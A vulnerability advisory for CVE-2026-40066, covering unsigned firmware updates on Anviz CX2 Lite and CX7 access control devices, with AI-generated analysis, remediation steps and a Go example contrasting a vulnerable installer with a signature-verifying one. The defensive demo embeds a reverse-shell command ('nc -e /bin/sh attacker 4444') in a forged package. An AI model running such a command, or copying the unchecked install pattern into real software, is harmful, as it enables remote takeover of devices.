
CVE-2026-40066 | EUVD-2026-23494
Download of Code Without Integrity Check (CWE-494)
Severity: HIGH, CVSS 3.1 base score 8.8
Published 2026-04-17, source: icscert

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline (5 events)

Re-analysis Queued (cvss_changed): Apr 17, 2026 20:22, vuln.today
Analysis Generated: Apr 17, 2026 20:07, vuln.today
EUVD ID Assigned (EUVD-2026-23494): Apr 17, 2026 19:45, euvd
Analysis Generated: Apr 17, 2026 19:45, vuln.today
CVE Published (HIGH 8.8): Apr 17, 2026 19:43, nvd

Description (NVD)

Anviz CX2 Lite and CX7 are vulnerable to unverified update packages that can be uploaded. The device unpacks and executes a script resulting in unauthenticated remote code execution.

Analysis (AI-generated)

Remote code execution in Anviz CX2 Lite and CX7 access control devices: an attacker who can reach the firmware update upload function submits a crafted update package, and the device unpacks it and executes the contained script without any integrity or signature check (CWE-494). Note that the sources on this page disagree on the privilege needed: the NVD description calls the result unauthenticated RCE, while the CVSS vector scores it as PR:L (a low-privileged account). Treat any credential that can reach the upload endpoint, default credentials included, as sufficient, and do not rely on the login prompt as the control. Reported by ICS-CERT; these devices are physical access control systems commonly deployed in enterprise and critical infrastructure environments. …
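The fault class here is that the device parses and runs an uploaded package before establishing who produced it. The Go program below is an added example, not Anviz code and not their update format (which this page does not describe): the package layout, the names BuildSignedUpdate, VulnerableInstall and VerifiedInstall, and the Ed25519-over-SHA-256 scheme are all assumptions for illustration. It puts the CWE-494 installer beside a hardened one: the verified path checks the vendor signature over the whole archive before a single byte is parsed, then refuses archive entries that would escape the install directory, a second check that matters once update contents are trusted.

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
	"path"
	"strings"
)

// Hypothetical update layout for this example (not Anviz's real format):
// <update.tar.gz> followed by a 64-byte Ed25519 signature over SHA-256(update.tar.gz).
const sigLen = ed25519.SignatureSize

var ErrBadSignature = errors.New("update rejected: signature does not verify against the vendor key")
var ErrUnsafePath = errors.New("update rejected: archive entry escapes the install directory")

// BuildSignedUpdate is the vendor-side step: pack one script, then sign the exact bytes the device unpacks.
func BuildSignedUpdate(priv ed25519.PrivateKey, entryName, script string) ([]byte, error) {
	var buf bytes.Buffer
	gz := gzip.NewWriter(&buf)
	tw := tar.NewWriter(gz)
	hdr := &tar.Header{Name: entryName, Mode: 0o755, Size: int64(len(script))}
	if err := tw.WriteHeader(hdr); err != nil {
		return nil, err
	}
	if _, err := tw.Write([]byte(script)); err != nil {
		return nil, err
	}
	if err := errors.Join(tw.Close(), gz.Close()); err != nil { // tar footer first, then gzip footer
		return nil, err
	}
	digest := sha256.Sum256(buf.Bytes())
	return append(buf.Bytes(), ed25519.Sign(priv, digest[:])...), nil
}

// VulnerableInstall is the CWE-494 pattern in the advisory: the signature field is
// carried along but never checked, so whatever was uploaded is unpacked and run.
func VulnerableInstall(pkg []byte) (map[string]string, error) {
	if len(pkg) < sigLen {
		return nil, errors.New("short package")
	}
	return unpack(pkg[:len(pkg)-sigLen]) // signature bytes skipped, never verified
}

// VerifiedInstall checks the signature over the whole archive before any of it is
// parsed; vendorPub is the public key baked into the device firmware.
func VerifiedInstall(vendorPub ed25519.PublicKey, pkg []byte) (map[string]string, error) {
	n := len(pkg) - sigLen
	if n < 0 {
		return nil, ErrBadSignature
	}
	digest := sha256.Sum256(pkg[:n])
	if !ed25519.Verify(vendorPub, digest[:], pkg[n:]) {
		return nil, ErrBadSignature
	}
	return unpack(pkg[:n])
}

// unpack returns the archive's files keyed by cleaned path and refuses entries that
// escape the install directory, so even a signed package cannot overwrite arbitrary files.
func unpack(archive []byte) (map[string]string, error) {
	gz, err := gzip.NewReader(bytes.NewReader(archive))
	if err != nil {
		return nil, err
	}
	tr, out := tar.NewReader(gz), map[string]string{}
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return out, nil
		}
		if err != nil {
			return nil, err
		}
		name := path.Clean(hdr.Name)
		if path.IsAbs(name) || name == ".." || strings.HasPrefix(name, "../") {
			return nil, ErrUnsafePath
		}
		body, err := io.ReadAll(tr)
		if err != nil {
			return nil, err
		}
		out[name] = string(body)
	}
}

func main() {
	vendorPub, _, _ := ed25519.GenerateKey(rand.Reader)
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader) // constructed attacker key, not the vendor's
	forged, _ := BuildSignedUpdate(attackerPriv, "install.sh", "#!/bin/sh\nnc -e /bin/sh attacker 4444\n")
	_, vErr := VulnerableInstall(forged)
	_, sErr := VerifiedInstall(vendorPub, forged)
	fmt.Printf("forged package: vulnerable installer err=%v | verified installer err=%v\n", vErr, sErr)
}
```

Run directly, it shows the forged package passing the vulnerable installer (err=nil) and failing the verified one. Two design points carry over to any real implementation: the signature covers exactly the bytes that are unpacked, so there is no parse-then-verify window, and only the public key lives on the device, so extracting the firmware does not yield a signing key (a symmetric MAC key stored on the device would). Rollback protection (refusing an older, validly signed package) is a separate check this example leaves out.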


Remediation (AI-generated)

Within 24 hours: inventory all Anviz CX2 Lite and CX7 devices in production and document their network connectivity; restrict administrative access to essential personnel only and enforce strong, non-default passwords, since any account able to reach the update upload function is enough to exploit this.

Within 7 days: segment the affected access control devices away from general IT infrastructure; disable remote administration where operationally feasible; monitor for unexpected firmware uploads and administrative logins. Because the device itself does not verify what it installs, that monitoring has to come from outside the device (network captures, proxy or firewall logs of upload requests), as a compromised unit cannot be trusted to report on its own firmware. …



CVE-2026-40066 vulnerability details – vuln.today
